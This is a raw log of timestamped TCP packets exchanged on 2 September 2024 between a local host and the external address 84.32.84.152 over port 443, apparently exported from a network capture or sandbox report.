Sep 2, 2024 08:21:14.369021893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369057894 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369174004 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369224072 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369299889 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369342089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369452953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369499922 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369565010 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369613886 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369766951 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369801044 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369812012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369817972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369832993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369841099 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369877100 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369883060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369893074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369920015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369929075 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369935036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.369954109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.369966984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370043039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370076895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370084047 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370095015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370119095 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370129108 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370130062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370141029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370170116 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370197058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370232105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370233059 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370242119 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370270967 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370280981 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370315075 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370326042 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370332956 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370357990 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370364904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370376110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.370399952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370434999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.370492935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.402923107 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.402956963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.403000116 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.403012037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.403038025 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.403050900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460031986 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460083008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460135937 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460150957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460164070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460195065 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460225105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460237980 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460244894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460305929 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460342884 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460380077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460390091 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460396051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460411072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460444927 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460504055 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460536957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460546017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460555077 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460588932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460625887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460633993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460639954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460659027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460674047 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460689068 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460695982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460711002 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460721970 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460755110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460760117 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460797071 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460902929 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460942984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460948944 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460957050 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.460985899 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.460998058 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461002111 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461008072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461039066 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461052895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461082935 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461098909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461108923 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461119890 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461184025 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461225033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461229086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461236000 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461263895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461334944 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461345911 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461378098 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461432934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461450100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461487055 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461496115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461500883 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461522102 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461534023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461539984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461564064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461596012 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461628914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461642027 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461648941 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461673975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461721897 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461749077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461766005 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461772919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461795092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461797953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461838961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461848021 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.461853981 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.461890936 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.462327957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.485379934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.485457897 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.485486031 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.485497952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.485652924 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.527271986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.542818069 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.542916059 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.542926073 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.542967081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.542980909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.542988062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543009996 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543070078 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543103933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543116093 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543123007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543148994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543165922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543211937 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543220043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543257952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543268919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543307066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543319941 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543324947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543344021 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543353081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543368101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543374062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543390036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543448925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543494940 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543502092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543539047 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543540001 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543554068 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543582916 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543591976 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543628931 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543644905 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543651104 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543694973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543776035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543809891 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543833971 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543838978 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543848991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543889999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543921947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543936014 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.543941975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.543960094 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544015884 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544056892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544063091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544090986 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544106960 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544114113 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544125080 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544239998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544289112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544290066 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544298887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544328928 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544328928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544374943 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544382095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544421911 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544445992 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544485092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544514894 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544531107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544538021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544554949 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544572115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544608116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544655085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544771910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.544822931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.544995070 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545038939 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545046091 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545051098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545073032 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545085907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545099020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545099020 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545106888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545130014 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545137882 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545166016 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545171022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.545744896 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.545772076 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.573726892 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.573772907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.573930979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.573940992 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.573988914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.625677109 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625724077 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625758886 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625785112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.625797033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625807047 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625842094 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.625849009 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625859022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625873089 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.625884056 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.625888109 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.625916958 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626111031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626151085 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626158953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626168013 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626208067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626209974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626251936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626261950 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626271963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626291037 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626322031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626322031 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626347065 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626353979 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626377106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626435995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626478910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626482010 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626490116 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626524925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626530886 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626565933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626570940 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626594067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626626968 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626633883 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626660109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626719952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626760006 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626768112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626776934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626818895 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626828909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626872063 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626919031 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626925945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.626962900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.626993895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627022982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627037048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627043962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627072096 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627098083 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627140999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627180099 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627190113 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627196074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627230883 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627250910 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627291918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627296925 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627302885 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627331972 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627357006 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627374887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627424955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627453089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627500057 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627548933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627593994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627682924 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627717972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627729893 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627734900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627752066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627753019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627804995 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.627811909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.627851963 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.630085945 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.656352043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.656384945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.656449080 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.656457901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.656507015 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.656512976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708628893 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708669901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708710909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708718061 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708730936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708743095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708762884 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708790064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:14.708795071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:14.708817005 CEST	443	49744	84.32.84.152	192.168.2.6
